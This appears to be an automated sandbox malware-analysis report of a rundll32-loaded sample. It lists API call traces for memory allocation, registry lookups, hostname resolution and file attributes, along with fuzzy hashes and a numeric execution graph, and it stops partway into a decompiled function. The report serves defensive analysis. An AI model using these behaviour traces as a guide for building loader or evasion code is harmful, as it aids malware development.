    control_flow_graph 1063 100094c0-100094cb 1064 10009506-10009507 1063->1064 1065 100094cd-100094d4 1063->1065 1066 100094d6 call 10009360 1065->1066 1067 100094db-100094e1 1065->1067 1066->1067 1068 100094e3-100094e9 1067->1068 1069 100094eb-100094f6 IsBadHugeReadPtr 1067->1069 1068->1064 1068->1069 1069->1064 1071 100094f8-10009500 RtlFreeHeap 1069->1071 1071->1064
    APIs
    • IsBadHugeReadPtr.KERNEL32(10009B89,00000008), ref: 100094EE
    • RtlFreeHeap.NTDLL(1006A1D4,00000000,10009B89), ref: 10009500
      • Part of subcall function 10009360: GetModuleHandleA.KERNEL32(1006A1C0,10009536,?,?,?,100081F5,00000001,?,?,?,00000000), ref: 1000936A
    Memory Dump Source
    • Source File: 00000004.00000002.321066532.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
    Similarity
    • API ID: FreeHandleHeapHugeModuleRead
    • String ID:
    • API String ID: 3105250205-0
    • Opcode ID: ca834bc4244fce640a793ff6be1dd1a44b6c0ac53575205badff9968adfb3274
    • Instruction ID: f4d6e6dfc0ea5ddfd767db067c6581f7df8aba6c1037937aeb9ef0df71b1f4fd
    • Opcode Fuzzy Hash: ca834bc4244fce640a793ff6be1dd1a44b6c0ac53575205badff9968adfb3274
    • Instruction Fuzzy Hash: 47E01231E0253297F621FB179C88A4A77D9EB477D1F014016F545A7058D374AC818FA1
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 001F0625
    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 001F0658
    Memory Dump Source
    • Source File: 00000004.00000003.311864524.00000000001F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_3_1f0000_rundll32.jbxd
    Similarity
    • API ID: Virtual$AllocFree
    • String ID:
    • API String ID: 2087232378-0
    • Opcode ID: 8f1e82fa3ca701645e3a29dd561cede71442c6ae341de50c792d69400040f94a
    • Instruction ID: de82e9e876a93baff0b7a550c426a4a9b1adb8e3eb28e1760b978d67ff63f0db
    • Opcode Fuzzy Hash: 8f1e82fa3ca701645e3a29dd561cede71442c6ae341de50c792d69400040f94a
    • Instruction Fuzzy Hash: D9212635A0021DBFDB018F60CC40BFEFBB5EB58394F20C122EA10A2291E7B08A119B50
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 2969 10009390-1000939f call 10009330 2972 100093a1-100093a5 ExitProcess 2969->2972 2973 100093ad-100093bf 2969->2973
    APIs
    Memory Dump Source
    • Source File: 00000004.00000002.321066532.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
    Similarity
    • API ID: ExitProcess
    • String ID:
    • API String ID: 621844428-0
    • Opcode ID: 808f9db0dc529ccc6febb549eafa899a22df3bfee1d1e0ee509ec620f588b9fb
    • Instruction ID: 83411d840e5b6f42aa8eb0b9e9c873287c900da43e5ea80d46ae5ad2abf97bab
    • Opcode Fuzzy Hash: 808f9db0dc529ccc6febb549eafa899a22df3bfee1d1e0ee509ec620f588b9fb
    • Instruction Fuzzy Hash: 4CD09E785002559BE700FF69C98554A37A9B706680F808014ED558B355E674FA948FA1
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 2974 10009710-10009720 SetFileAttributesA
    APIs
    • SetFileAttributesA.KERNELBASE(00000000,00000002,10007744,00000002,00000000,00000000,80000004,00000002,00000000,80000301,00000000,10069CE3,10069CDB,100695C2,00000000), ref: 1000971A
    Memory Dump Source
    • Source File: 00000004.00000002.321066532.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
    Similarity
    • API ID: AttributesFile
    • String ID:
    • API String ID: 3188754299-0
    • Opcode ID: 2708e965b174b85047c8d0145172c59c26a25c7f0d4e6f625563eef8cc2badcf
    • Instruction ID: ba1b9f9736472015c9caeb0e2b2585a1f4e95ecc7d51d8cd3f73c6f4105449ec
    • Opcode Fuzzy Hash: 2708e965b174b85047c8d0145172c59c26a25c7f0d4e6f625563eef8cc2badcf
    • Instruction Fuzzy Hash: 7EB092B4104201ABDA04DB10C984D2A77A8AB84280F004848B44982110C630D844CA32
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 2975 10083555-10083567 2976 10083569-10083575 2975->2976 2977 1008357b-100835b1 VirtualAlloc 2975->2977 2976->2977 2978 100837bd-100837c5 2976->2978 2979 10083921-10083929 2977->2979 2980 100835b7-100835bd call 100835c2 2977->2980 2981 100837d1-100837d2 2978->2981 2982 100837c7-100837ce 2978->2982 2980->2979 2981->2979
    APIs
    • VirtualAlloc.KERNELBASE(00000000,00001000,00001000,00000040), ref: 100835A9
    Memory Dump Source
    • Source File: 00000004.00000002.321187702.0000000010080000.00000040.00000800.00020000.00000000.sdmp, Offset: 10080000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_10080000_rundll32.jbxd
    Similarity
    • API ID: AllocVirtual
    • String ID:
    • API String ID: 4275171209-0
    • Opcode ID: 249bba57007782f45bf0e84b72b43045c2c6b24cb456ac19ab3cd77c178e24dd
    • Instruction ID: 0e55dd4c9f7470d52eab4346b396aa946e407808a0d127f0e42209d590d0d6a2
    • Opcode Fuzzy Hash: 249bba57007782f45bf0e84b72b43045c2c6b24cb456ac19ab3cd77c178e24dd
    • Instruction Fuzzy Hash: 97F04F35D483688BDF61CE248C0C7D9BBB0AB40340F0144D9E9C977295D6B46EC68F54
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • GetModuleFileNameA.KERNEL32(00000000,1006A2E0,00000104), ref: 1000AE7E
    • strrchr.MSVCRT ref: 1000AE8F
    • _ftol.MSVCRT ref: 1000AFCE
    • GetCommandLineA.KERNEL32 ref: 1000AFF4
    • PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000000), ref: 1000B061
    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 1000B093
    • TranslateMessage.USER32(?), ref: 1000B09A
    • DispatchMessageA.USER32(?), ref: 1000B0A1
    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1000B0B0
    • wsprintfA.USER32 ref: 1000B2F3
    • MessageBoxA.USER32(00000000,?,1006A018,00000010), ref: 1000B30A
    Memory Dump Source
    • Source File: 00000004.00000002.321066532.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
    Similarity
    • API ID: Message$Peek$CommandDispatchFileLineModuleNameTranslate_ftolstrrchrwsprintf
    • String ID:
    • API String ID: 3335176381-0
    • Opcode ID: 92a5994cca1b7ef60fe66651f58af9c9c81d6aabc4c705b83f258a490ed8930e
    • Instruction ID: 550dcc155c2af2a742ea6bd1faa3485fa46c40cd6c1f5de1c3546930abff5cc3
    • Opcode Fuzzy Hash: 92a5994cca1b7ef60fe66651f58af9c9c81d6aabc4c705b83f258a490ed8930e
    • Instruction Fuzzy Hash: 48C139377849044AF320E668BC41BFFB781E7D13F2F50053BEA05CA1D4D96BA949CA66
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,?,00000000), ref: 1000C4CB
    • GetWindowsDirectoryA.KERNEL32(00000000,00000104), ref: 1000C4EA
    • GetSystemDirectoryA.KERNEL32(00000000,00000104), ref: 1000C501
    • GetTempPathA.KERNEL32(00000104,00000000), ref: 1000C518
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.321066532.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
    Similarity
    • API ID: DirectoryPath$FolderSpecialSystemTempWindows
    • String ID: \$\
    • API String ID: 2721284240-164819647
    • Opcode ID: 9b90a25063b9e1c39bff7ddda37614abe361fa60ecb1f47f8ab911e9c3895cb3
    • Instruction ID: 77cbe7fce8ef9562389d15453b58eba8ebe27cca9de610a2ae966a0e19f657af
    • Opcode Fuzzy Hash: 9b90a25063b9e1c39bff7ddda37614abe361fa60ecb1f47f8ab911e9c3895cb3
    • Instruction Fuzzy Hash: 7F3103B550874A9BF720C728CC95F6E36D0E7417C0F20891AF585C60D9E6B4E88097A2
    Uniqueness

    Uniqueness Score: -1.00%

    Memory Dump Source
    • Source File: 00000004.00000002.321066532.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 60cd75bbc9cd8ca24744c5fda6e17e72869eac0f45f0e376a98c2c6226a09f87
    • Instruction ID: 997e975f8056afc4703edd2e8b222d0f39c38b45864d1c521b5624a5b2537b3b
    • Opcode Fuzzy Hash: 60cd75bbc9cd8ca24744c5fda6e17e72869eac0f45f0e376a98c2c6226a09f87
    • Instruction Fuzzy Hash: 69514A756046054BF738C6248C42AEF73D5EBC23A0F248B2DFA55C31D8EE7AD9858392
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • malloc.MSVCRT ref: 1000BB13
    • LCMapStringA.KERNEL32(00000804,00400000,?,?,00000000,?,?,?,100695CA,?,00000000,00000000,?,10009E2B,00000001,00000000), ref: 1000BB47
    • ??3@YAXPAX@Z.MSVCRT ref: 1000BB56
    • ??3@YAXPAX@Z.MSVCRT ref: 1000BB74
    Memory Dump Source
    • Source File: 00000004.00000002.321066532.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
    Similarity
    • API ID: ??3@$Stringmalloc
    • String ID:
    • API String ID: 1006641717-0
    • Opcode ID: 6a2a28c6ebfc604dd3311785f4f21d4eed50436354b036f7b997f2173f3be702
    • Instruction ID: c44458945b11d331972013727580eba0770bfaca40fb43e82456e2fbb398e2da
    • Opcode Fuzzy Hash: 6a2a28c6ebfc604dd3311785f4f21d4eed50436354b036f7b997f2173f3be702
    • Instruction Fuzzy Hash: ED1105762046043BE218DA799C42E6B73CADBC42A1F10462DF226922C5DE72ED054765
    Uniqueness

    Uniqueness Score: -1.00%

    Execution Graph

    Execution Coverage:3%
    Dynamic/Decrypted Code Coverage:1.1%
    Signature Coverage:25.2%
    Total number of Nodes:1076
    Total number of Limit Nodes:52
    execution_graph 57966 40a860 57967 40a86c 57966->57967 57968 40a896 57967->57968 57976 483330 57967->57976 58020 40b7d0 57968->58020 57970 40a883 57984 40ba00 57970->57984 57973 40a88d 58015 4832c2 57973->58015 57977 483344 57976->57977 57983 483357 ctype 57976->57983 57978 483359 lstrlen 57977->57978 57979 48334e 57977->57979 57980 483366 57978->57980 57978->57983 58023 488ab3 66 API calls ctype 57979->58023 58024 48312f 31 API calls ctype 57980->58024 57983->57970 58025 483854 57984->58025 57986 40ba2e 58028 4839c2 57986->58028 57988 40bafb 57989 483905 ctype 39 API calls 57988->57989 57990 40bb07 57989->57990 58064 483892 23 API calls 57990->58064 57991 40ba57 57991->57988 57992 40ba76 57991->57992 57993 40bac7 57991->57993 58041 40b5f0 57992->58041 57995 40b7d0 2 API calls 57993->57995 57998 40bace 57995->57998 57996 40ba7e 57996->57988 57999 40ba82 57996->57999 58001 483905 ctype 39 API calls 57998->58001 58050 483adf 57999->58050 58000 40bb24 58004 40b7d0 2 API calls 58000->58004 58002 40bada 58001->58002 58063 483892 23 API calls 58002->58063 58007 40bb2b 58004->58007 58007->57973 58008 40bae6 58008->57973 58009 40ba9a 58055 483905 58009->58055 58014 40bab2 58014->57973 58016 4832ea 58015->58016 58017 4832d2 InterlockedDecrement 58015->58017 58016->57968 58017->58016 58018 4832e0 58017->58018 58167 4831b1 31 API calls ctype 58018->58167 58168 40b7f0 58020->58168 58022 40a8c7 58023->57983 58024->57983 58065 48386a GetLastError 58025->58065 58027 483860 58027->57986 58092 48324d 58028->58092 58036 483aa8 58037 483acc 58036->58037 58038 483aaf GetLastError 58036->58038 58037->57991 58039 483abe ctype 58038->58039 58040 4833ff ctype 35 API calls 58039->58040 58040->58037 58042 40b5fc 58041->58042 58047 40b60c 58041->58047 58156 40b6c0 7 API calls 58042->58156 58044 40b606 58044->57996 58045 40b68a RtlAllocateHeap 58048 40b6a1 58045->58048 58046 40b67f GetProcessHeap 58046->58045 58047->58045 58047->58046 58049 40b614 58047->58049 58048->57996 58049->57996 
    58051 40ba8c 58050->58051 58052 483aec ReadFile 58050->58052 58051->58009 58061 40b6c0 7 API calls 58051->58061 58052->58051 58053 483b05 GetLastError 58052->58053 58157 488652 36 API calls ctype 58053->58157 58057 48390f __EH_prolog 58055->58057 58056 483934 58058 4832c2 ctype 32 API calls 58056->58058 58057->58056 58158 483bdd 58057->58158 58060 40baa6 58058->58060 58062 483892 23 API calls 58060->58062 58061->58009 58062->58014 58063->58008 58064->58000 58068 48cc47 58065->58068 58069 48cc7d TlsGetValue 58068->58069 58070 48cc50 58068->58070 58071 48cc90 58069->58071 58072 48cc6a 58070->58072 58089 48c847 RaiseException TlsAlloc RtlInitializeCriticalSection ctype 58070->58089 58076 48cca3 58071->58076 58077 483883 SetLastError 58071->58077 58079 48c8e0 RtlEnterCriticalSection 58072->58079 58075 48cc7b 58075->58069 58090 48ca4f 8 API calls ctype 58076->58090 58077->58027 58084 48c8ff 58079->58084 58080 48c9bb ctype 58081 48c9d0 RtlLeaveCriticalSection 58080->58081 58081->58075 58082 48c939 GlobalAlloc 58085 48c96e 58082->58085 58083 48c94c GlobalHandle GlobalUnWire GlobalReAlloc 58083->58085 58084->58080 58084->58082 58084->58083 58086 48c97c GlobalHandle GlobalFix RtlLeaveCriticalSection 58085->58086 58087 48c997 GlobalFix 58085->58087 58091 481443 RaiseException ctype 58086->58091 58087->58080 58089->58072 58090->58077 58093 48326a 58092->58093 58094 483255 58092->58094 58096 483cee 58093->58096 58095 4833ff ctype 35 API calls 58094->58095 58095->58093 58116 473304 58096->58116 58098 483cf8 GetFullPathNameA 58099 483d1b lstrcpyn 58098->58099 58100 483d2d 58098->58100 58101 4839fa 58099->58101 58117 483dbe 58100->58117 58111 4833ff 58101->58111 58104 483d5e 58106 483d6b 58104->58106 58107 483d64 CharUpperA 58104->58107 58105 483d9d 58108 4832c2 ctype 32 API calls 58105->58108 58106->58105 58109 483d71 FindFirstFileA 58106->58109 58107->58106 58108->58101 58109->58105 58110 483d86 FindClose lstrcpy 58109->58110 58110->58105 58112 48340b 58111->58112 58113 48340f lstrlen
    58111->58113 58145 483382 58112->58145 58113->58112 58115 48341f CreateFileA 58115->58036 58115->58037 58116->58098 58124 4836a6 58117->58124 58119 483dd0 ctype 58120 483ddc lstrcpyn 58119->58120 58121 483def 58120->58121 58130 4836f5 58121->58130 58125 4836b9 58124->58125 58126 4836ed 58125->58126 58135 48312f 31 API calls ctype 58125->58135 58126->58119 58128 4836d0 ctype 58136 48322a 32 API calls ctype 58128->58136 58137 48326b 58130->58137 58132 4836fd 58133 48370e GetVolumeInformationA 58132->58133 58134 483706 lstrlen 58132->58134 58133->58104 58133->58105 58134->58133 58135->58128 58136->58126 58138 483277 58137->58138 58142 483286 ctype 58137->58142 58143 4831f9 32 API calls ctype 58138->58143 58140 48327c 58144 48312f 31 API calls ctype 58140->58144 58142->58132 58143->58140 58144->58142 58148 483299 58145->58148 58147 483390 ctype 58147->58115 58149 4832a9 58148->58149 58150 4832bd 58149->58150 58154 4831f9 32 API calls ctype 58149->58154 58150->58147 58152 4832b5 58155 48312f 31 API calls ctype 58152->58155 58154->58152 58155->58150 58156->58044 58157->58051 58159 483bf9 58158->58159 58160 483beb FindCloseChangeNotification 58158->58160 58161 48324d ctype 35 API calls 58159->58161 58160->58159 58162 483c09 58161->58162 58163 483c1d 58162->58163 58164 483c0f GetLastError 58162->58164 58163->58056 58166 488652 36 API calls ctype 58164->58166 58166->58163 58167->58016 58169 40b7fa 58168->58169 58170 40b84e 58168->58170 58171 40b844 RtlFreeHeap 58169->58171 58172 40b839 GetProcessHeap 58169->58172 58173 40b80e 58169->58173 58170->58022 58171->58170 58172->58171 58173->58022 58174 40a420 58175 40a463 58174->58175 58176 40a42b 58174->58176 58179 41b060 RtlAllocateHeap 58176->58179 58180 41b080 58179->58180 58182 40a434 58179->58182 58183 417df0 wsprintfA 58180->58183 58186 417e20 58183->58186 58187 417e5d 58186->58187 58188 483330 67 API calls 58187->58188 58190 417f26 58187->58190 58189 417e9d 58188->58189 58194 417edb 58189->58194 58216 41ef10 wsprintfA
    58189->58216 58193 40b7d0 2 API calls 58190->58193 58192 417eb2 58217 483652 35 API calls 58192->58217 58198 417f3f 58193->58198 58195 417f0b 58194->58195 58220 483652 35 API calls 58194->58220 58212 4200e0 MessageBoxA 58195->58212 58197 417ec2 58218 483652 35 API calls 58197->58218 58213 41b040 58198->58213 58203 417ef5 58221 483652 35 API calls 58203->58221 58204 417f14 58205 4832c2 ctype 32 API calls 58204->58205 58205->58190 58206 417ece 58219 483652 35 API calls 58206->58219 58210 417efe 58222 483652 35 API calls 58210->58222 58212->58204 58223 418600 58213->58223 58216->58192 58217->58197 58218->58206 58219->58194 58220->58203 58221->58210 58222->58195 58224 418625 GetCurrentThreadId 58223->58224 58225 41867e 58223->58225 58224->58225 58226 418633 58224->58226 58287 4173a0 58225->58287 58228 418660 58226->58228 58229 418640 IsWindow 58226->58229 58231 418991 ExitProcess 58228->58231 58232 41866e ExitProcess 58228->58232 58229->58228 58230 41864b SendMessageA 58229->58230 58230->58228 58233 40b7d0 2 API calls 58235 4186ea 58233->58235 58236 40b7d0 2 API calls 58235->58236 58237 418727 58236->58237 58238 40b7d0 2 API calls 58237->58238 58243 418732 58238->58243 58239 41878a 58241 4187cc 58239->58241 58245 4187b2 58239->58245 58246 41879d FreeLibrary 58239->58246 58240 41875e 58244 40b7d0 2 API calls 58240->58244 58250 48324d ctype 35 API calls 58241->58250 58242 418752 FreeLibrary 58242->58243 58243->58239 58243->58240 58243->58242 58247 418769 58244->58247 58248 40b7d0 2 API calls 58245->58248 58246->58245 58246->58246 58251 40b7d0 2 API calls 58247->58251 58249 4187bd 58248->58249 58252 482437 32 API calls 58249->58252 58253 4187de 58250->58253 58254 418774 58251->58254 58252->58241 58255 418803 58253->58255 58256 4187f6 DestroyCursor 58253->58256 58257 40b7d0 2 API calls 58254->58257 58258 41881a 58255->58258 58259 41880d DestroyCursor 58255->58259 58256->58255 58260 41877f 58257->58260 58262 418824 IsWindow 58258->58262 58263 418835 58258->58263 
58259->58258 58261 40b7d0 2 API calls 58260->58261 58261->58239 58262->58263 58265 41882f 58262->58265 58294 4161a0 58263->58294 58338 484c12 58265->58338 58268 41888d 58315 41a8c0 58268->58315 58271 41890b 58272 40b7d0 2 API calls 58271->58272 58273 418916 58272->58273 58274 41892b 58273->58274 58275 41891f WSACleanup 58273->58275 58278 418937 58274->58278 58279 418959 58274->58279 58275->58274 58276 4188d3 DestroyCursor 58277 418896 58276->58277 58277->58271 58277->58276 58282 48302c 29 API calls ctype 58277->58282 58278->58279 58346 4181f0 63 API calls ctype 58278->58346 58321 482437 58279->58321 58282->58277 58283 418968 58284 482437 32 API calls 58283->58284 58285 418977 58284->58285 58285->58231 58286 418981 OleUninitialize 58285->58286 58286->58231 58288 40b7d0 2 API calls 58287->58288 58289 4173ae 58288->58289 58290 40b7d0 2 API calls 58289->58290 58291 4173b9 58290->58291 58292 40b7d0 2 API calls 58291->58292 58293 4173c4 58292->58293 58293->58233 58302 4161d8 58294->58302 58295 416275 58297 40b7d0 2 API calls 58295->58297 58296 483854 23 API calls 58296->58302 58298 416280 58297->58298 58299 40b7d0 2 API calls 58298->58299 58300 41628b 58299->58300 58303 4826d1 58300->58303 58301 483892 23 API calls 58301->58302 58302->58295 58302->58296 58302->58301 58304 4826e1 58303->58304 58305 4826ed 58304->58305 58306 482704 58304->58306 58347 48302c 29 API calls ___free_lc_time 58305->58347 58308 48270b 58306->58308 58311 482730 58306->58311 58348 483003 29 API calls ___free_lc_time 58308->58348 58310 4826f5 ctype 58310->58268 58311->58310 58349 483003 29 API calls ___free_lc_time 58311->58349 58313 48279e ctype 58350 48302c 29 API calls ___free_lc_time 58313->58350 58316 41a8c8 58315->58316 58351 41aa80 58316->58351 58320 41a8d9 58320->58277 58322 482447 58321->58322 58323 482453 58322->58323 58324 482477 58322->58324 58385 482415 32 API calls ctype 58323->58385 58326 48247e 58324->58326 58327 4824a1 58324->58327 58387 483003 29 API calls ___free_lc_time 
58326->58387 58332 4824a8 58327->58332 58333 4824d1 58327->58333 58328 48245e 58386 48302c 29 API calls ___free_lc_time 58328->58386 58331 482466 58331->58283 58332->58331 58388 482415 32 API calls ctype 58332->58388 58389 483003 29 API calls ___free_lc_time 58333->58389 58336 482513 ctype 58390 48302c 29 API calls ___free_lc_time 58336->58390 58339 484c1c __EH_prolog 58338->58339 58391 48c6e5 58339->58391 58341 484c22 ctype 58344 484c60 ctype 58341->58344 58396 483003 29 API calls ___free_lc_time 58341->58396 58343 484c44 58343->58344 58397 488c61 29 API calls 2 library calls 58343->58397 58344->58263 58346->58278 58347->58310 58348->58310 58349->58313 58350->58310 58352 41aa93 58351->58352 58353 41aacc 58351->58353 58352->58353 58357 41aaba WaitForSingleObject 58352->58357 58354 41aaf5 58353->58354 58355 41aad8 CloseHandle 58353->58355 58356 41ab16 58354->58356 58380 4280b0 39 API calls ctype 58354->58380 58355->58354 58375 416120 58356->58375 58357->58353 58361 43cbb0 58362 43cbd3 58361->58362 58363 43cbe8 RtlEnterCriticalSection 58361->58363 58381 43cca0 RtlEnterCriticalSection SetEvent RtlLeaveCriticalSection 58362->58381 58366 43cc0f 58363->58366 58365 43cc41 RtlLeaveCriticalSection 58383 43cca0 RtlEnterCriticalSection SetEvent RtlLeaveCriticalSection 58365->58383 58366->58365 58382 4298e0 29 API calls ctype 58366->58382 58367 43cbd8 58367->58320 58370 43cc51 58371 43cc79 58370->58371 58372 43cc6e WaitForSingleObject 58370->58372 58384 48302c 29 API calls ___free_lc_time 58371->58384 58372->58370 58374 43cc7f 58374->58320 58376 40b7d0 2 API calls 58375->58376 58377 41612e 58376->58377 58378 40b7d0 2 API calls 58377->58378 58379 416139 58378->58379 58379->58361 58380->58356 58381->58367 58382->58366 58383->58370 58384->58374 58385->58328 58386->58331 58387->58331 58388->58331 58389->58336 58390->58331 58398 48c6bf 58391->58398 58394 48cc47 ctype 21 API calls 58395 48c6fb 58394->58395 58395->58341 58396->58343 58397->58344 58399 48cc47 ctype 21 API calls 
58398->58399 58400 48c6ce 58399->58400 58401 48c6e4 58400->58401 58403 48ccdc 58400->58403 58401->58394 58404 48cce6 __EH_prolog 58403->58404 58405 48cd14 58404->58405 58409 48d91f 6 API calls ctype 58404->58409 58405->58401 58407 48ccfd 58410 48d98f RtlLeaveCriticalSection 58407->58410 58409->58407 58410->58405 58411 40b4c0 58416 416160 58411->58416 58414 40b4e3 inet_ntoa 58415 40b4f5 58414->58415 58417 416173 WSAStartup 58416->58417 58418 40b4d2 gethostbyname 58416->58418 58417->58418 58418->58414 58418->58415 58419 40b3c0 58422 40aff0 58419->58422 58458 40ae90 58422->58458 58424 40b042 RegOpenKeyExA 58425 40b068 RegQueryValueExA 58424->58425 58428 40b17b 58424->58428 58426 40b2e1 RegCloseKey 58425->58426 58429 40b098 58425->58429 58426->58428 58427 40b0ab 58427->58426 58430 4832c2 ctype 32 API calls 58428->58430 58429->58426 58429->58427 58432 40b196 ExpandEnvironmentStringsA 58429->58432 58433 40b0eb 58429->58433 58434 40b1de 58429->58434 58431 40b38e 58430->58431 58432->58426 58435 40b1c4 RegCloseKey 58432->58435 58436 40b5f0 7 API calls 58433->58436 58437 40b5f0 7 API calls 58434->58437 58435->58428 58439 40b10a 58436->58439 58438 40b1fd 58437->58438 58440 40b207 RegQueryValueExA 58438->58440 58441 40b180 58438->58441 58439->58441 58442 40b110 RegQueryValueExA 58439->58442 58440->58441 58443 40b228 RegCloseKey ExpandEnvironmentStringsA 58440->58443 58446 40b7d0 2 API calls 58441->58446 58442->58441 58444 40b12b RegCloseKey 58442->58444 58447 40b250 58443->58447 58445 40b13d 58444->58445 58450 40b7d0 2 API calls 58445->58450 58446->58426 58448 40b5f0 7 API calls 58447->58448 58449 40b266 58448->58449 58451 40b2b5 58449->58451 58452 40b26c ExpandEnvironmentStringsA 58449->58452 58450->58428 58454 40b7d0 2 API calls 58451->58454 58453 40b27e 58452->58453 58455 40b7d0 2 API calls 58453->58455 58454->58441 58456 40b29e 58455->58456 58457 40b7d0 2 API calls 58456->58457 58457->58428 58459 40aeb0 58458->58459 58463 40af09 58458->58463 58460 4833ff ctype 35 API calls 
    58459->58460 58461 40aec0 58460->58461 58483 483652 35 API calls 58461->58483 58465 40af7c 58463->58465 58466 40af5c 58463->58466 58464 40aece 58484 483652 35 API calls 58464->58484 58470 483330 67 API calls 58465->58470 58468 48324d ctype 35 API calls 58466->58468 58471 40af65 58468->58471 58469 40aeda 58485 483652 35 API calls 58469->58485 58473 40af86 58470->58473 58471->58424 58486 480fc6 37 API calls 2 library calls 58473->58486 58474 40aee5 58474->58424 58476 40af9d 58487 4833af 58476->58487 58479 4832c2 ctype 32 API calls 58480 40afba 58479->58480 58481 4832c2 ctype 32 API calls 58480->58481 58482 40afd5 58481->58482 58482->58424 58483->58464 58484->58469 58485->58474 58486->58476 58488 4833bf 58487->58488 58493 40afac 58487->58493 58489 4833d6 58488->58489 58490 4833e3 58488->58490 58491 483382 ctype 34 API calls 58489->58491 58495 4831f9 32 API calls ctype 58490->58495 58491->58493 58493->58479 58494 4833ea InterlockedIncrement 58494->58493 58495->58494 58496 40b480 58497 416160 WSAStartup 58496->58497 58498 40b492 gethostname 58497->58498 58499 40b4a4 58498->58499 58500 470483 58501 470495 58500->58501 58505 4704f2 58500->58505 58503 4704a6 ___free_lc_time 58501->58503 58501->58505 58511 477589 46 API calls ___free_lc_time 58501->58511 58503->58505 58506 47754a 58503->58506 58507 477557 58506->58507 58508 477553 58506->58508 58512 47d13f 58507->58512 58508->58503 58511->58503 58513 47d172 CompareStringW 58512->58513 58515 47d187 58512->58515 58514 47d18f CompareStringA 58513->58514 58513->58515 58514->58515 58519 477576 58514->58519 58516 47d1e8 CompareStringA 58515->58516 58517 47d203 58515->58517 58516->58519 58518 47d2bd MultiByteToWideChar 58517->58518 58517->58519 58520 47d242 GetCPInfo 58517->58520 58518->58519 58522 47d2d9 58518->58522 58519->58503 58520->58519 58521 47d257 58520->58521 58521->58518 58521->58519 58522->58519 58523 47d315 MultiByteToWideChar 58522->58523 58523->58519 58524 47d32f MultiByteToWideChar 58523->58524 58524->58519 58525 47d347
    58524->58525 58525->58519 58526 47d37b MultiByteToWideChar 58525->58526 58526->58519 58527 47d392 CompareStringW 58526->58527 58527->58519 58528 46eb40 58529 46eb67 58528->58529 58530 46ebdb 58528->58530 58529->58530 58538 46eb6c SHGetSpecialFolderPathA 58529->58538 58531 46ebf2 58530->58531 58532 46ebe0 GetWindowsDirectoryA 58530->58532 58533 46ebf7 GetSystemDirectoryA 58531->58533 58534 46ec09 58531->58534 58537 46ebd9 58532->58537 58533->58537 58536 46ec0e GetTempPathA 58534->58536 58534->58537 58536->58537 58538->58537 58539 484ee0 58540 48ccdc ctype 7 API calls 58539->58540 58541 484ef4 58540->58541 58545 484f3e 58541->58545 58573 486a53 7 API calls 58541->58573 58544 484f42 58545->58544 58546 484d81 58545->58546 58574 473304 58546->58574 58548 484d8b GetPropA 58549 484e6b 58548->58549 58550 484dbe 58548->58550 58551 484c84 58 API calls 58549->58551 58552 484e4a 58550->58552 58553 484dc7 58550->58553 58555 484e73 58551->58555 58554 484c84 58 API calls 58552->58554 58556 484dcc 58553->58556 58557 484e26 SetWindowLongA RemovePropA GlobalFindAtomA GlobalDeleteAtom 58553->58557 58559 484e50 58554->58559 58560 484c84 58 API calls 58555->58560 58558 484e89 CallWindowProcA 58556->58558 58561 484dd7 58556->58561 58557->58558 58565 484e12 58558->58565 58599 484a43 66 API calls 58559->58599 58563 484e7b 58560->58563 58575 484c84 58561->58575 58600 4849e2 64 API calls 58563->58600 58565->58544 58566 484e62 58569 484e85 58566->58569 58569->58558 58569->58565 58573->58545 58574->58548 58576 484c12 ctype 57 API calls 58575->58576 58577 484c8d 58576->58577 58601 488cc6 58577->58601 58579 484c9a 58607 4876ab 58579->58607 58581 484ca4 58582 484946 GetWindowRect 58581->58582 58613 4874ea 58582->58613 58584 48495f CallWindowProcA 58585 484969 58584->58585 58586 4849dd 58585->58586 58587 484976 58585->58587 58586->58565 58588 4874ea GetWindowLongA 58587->58588 58589 484980 58588->58589 58589->58586 58590 484987 GetWindowRect 58589->58590 58590->58586 58591 48499e 

    Control-flow Graph

    C-Code - Quality: 84%
    			E00418600(unsigned int __ecx, int _a4) {
    				unsigned int _v8;
    				unsigned int _v12;
    				void* __esi;
    				void* __ebp;
    				unsigned int _t102;
    				struct HICON__* _t108;
    				struct HICON__* _t109;
    				struct HWND__* _t110;
    				int _t112;
